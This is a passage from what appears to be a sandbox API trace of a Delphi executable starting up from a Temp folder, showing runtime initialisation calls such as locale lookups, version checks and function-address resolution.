floating point operation") returned 0x20 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0108.388] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.388] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0108.388] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2a4460 [0108.388] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0108.388] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xff6b, 
lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0108.388] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0108.388] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0108.388] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.388] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0108.388] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, 
lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0108.388] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0108.388] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.388] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0108.389] GetThreadLocale () returned 0x409 [0108.389] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0108.389] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0108.389] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.389] GetProcAddress (hModule=0x76910000, 
lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0108.389] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0108.389] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2a4470 [0108.389] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0108.389] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0108.389] GetLastError () returned 0x7a [0108.389] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0108.389] GetCurrentThreadId () returned 0xcb8 [0108.389] GetCurrentThreadId () returned 0xcb8 [0108.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0108.389] GetThreadLocale () returned 0x409 [0108.390] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0108.390] GetThreadLocale () returned 0x409 [0108.390] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0108.390] GetCurrentThreadId () returned 0xcb8 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0108.390] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0108.390] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0108.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0108.391] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0108.391] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0108.391] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0108.391] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 
[0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0108.392] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0108.392] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0108.392] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0108.392] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0108.392] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16518143451) returned 1 [0108.392] GetTickCount () returned 0x25f00 [0108.392] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x15, wMilliseconds=0x34b)) [0108.392] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x15, wMilliseconds=0x34b)) [0108.392] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16518157563) returned 1 [0108.392] GetTickCount () returned 0x25f00 [0108.392] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x15, wMilliseconds=0x34b)) [0108.392] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x15, wMilliseconds=0x34b)) [0108.392] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0108.392] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0108.393] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0108.393] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0108.393] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) 
returned 27 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0108.393] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0108.393] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0108.393] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0108.393] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0108.393] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0108.393] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0108.394] GetThreadLocale () returned 0x409 [0108.394] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0108.394] GetCurrentThreadId () returned 0xcb8 [0108.394] GetCurrentThreadId () returned 0xcb8 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0108.394] GetThreadLocale () returned 0x409 [0108.394] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0108.394] GetThreadLocale () returned 0x409 [0108.394] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0108.394] GetCurrentThreadId () returned 0xcb8 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 